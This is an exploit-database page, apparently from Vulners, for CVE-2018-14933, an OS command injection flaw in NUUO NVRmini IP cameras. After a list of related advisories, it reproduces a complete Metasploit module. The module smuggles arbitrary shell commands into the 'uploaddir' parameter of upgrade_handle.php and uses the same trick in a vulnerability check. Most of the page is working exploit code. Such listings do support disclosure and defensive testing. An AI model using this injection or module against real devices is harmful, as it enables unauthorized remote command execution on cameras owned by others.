NUUO NVRmini upgrade_handle.php Remote Command Execution

🗓️ 07 Feb 2019 00:00:00Reported by Berk DusunurType

packetstorm🔗 packetstormsecurity.com👁 255 Views

NUUO NVRmini upgrade_handle.php Remote Command Execution vulnerability in web application of NUUO NVRmini IP camera, triggered by writeuploaddir command in upgrade_handle.php file

Reporter	Title	Published	Views	Family All 18
0day.today	NUUO NVRmini upgrade_handle.php Remote Command Execution Exploit	7 Feb 201900:00	–	zdt
ATTACKERKB	CVE-2018-14933	4 Aug 201800:00	–	attackerkb
Circl	CVE-2018-14933	7 Feb 201905:01	–	circl
CISA KEV Catalog	NUUO NVRmini Devices OS Command Injection Vulnerability	18 Dec 202400:00	–	cisa_kev
CISA	CISA Adds Four Known Exploited Vulnerabilities to Catalog	18 Dec 202412:00	–	cisa
CVE	CVE-2018-14933	4 Aug 201819:00	–	cve
Cvelist	CVE-2018-14933	4 Aug 201819:00	–	cvelist
Exploit DB	NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)	11 Feb 201900:00	–	exploitdb
Metasploit	NUUO NVRmini upgrade_handle.php Remote Command Execution	6 Dec 201802:51	–	metasploit
Nuclei	NUUO NVRmini - Remote Command Execution	6 Jun 202603:01	–	nuclei

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info={})  
super(update_info(info,  
'Name' => 'NUUO NVRmini upgrade_handle.php Remote Command Execution',  
'Description' => %q{  
This exploits a vulnerability in the web application of NUUO NVRmini IP camera,  
which can be done by triggering the writeuploaddir command in the upgrade_handle.php file.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'Berk Dusunur', # @berkdusunur  
'numan turle' # @numanturle  
],  
'References' =>  
[  
['URL', 'https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html'],  
['URL', 'https://www.tenable.com/security/research/tra-2018-41'],  
['CVE', '2018-14933'],  
['EDB', '45070']  
],  
'Privileged' => false,  
'Payload' =>  
{  
'DisableNops' => true  
},  
'Platform' => %w{ unix win linux },  
'Arch' => ARCH_CMD,  
'Targets' => [ ['NUUO NVRmini', { }], ],  
'DisclosureDate' => 'Aug 04 2018',  
'DefaultTarget' => 0))  
end  
  
def check  
res = send_request_cgi({  
'uri' => normalize_uri(target_uri.path, 'upgrade_handle.php'),  
'vars_get' =>  
{  
'cmd' => 'writeuploaddir',  
'uploaddir' => "';echo '#{Rex::Text.rand_text_alphanumeric(10..15)}';'"  
}}  
)  
  
unless res  
vprint_error 'Connection failed'  
return CheckCode::Unknown  
end  
  
if res.code == 200 && res.body =~ /upload_tmp_dir/  
return CheckCode::Vulnerable  
end  
  
CheckCode::Safe  
end  
  
def http_send_command(cmd)  
uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")  
res = send_request_cgi({  
'method' => 'GET',  
'uri' => uri,  
'vars_get' =>  
{  
'cmd' => 'writeuploaddir',  
'uploaddir' => "';"+cmd+";'"  
}}  
)  
  
unless res  
fail_with(Failure::Unknown, 'Failed to execute the command.')  
end  
  
res  
end  
  
def exploit  
http_send_command(payload.encoded)  
end  
end  
`

07 Feb 2019 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.93874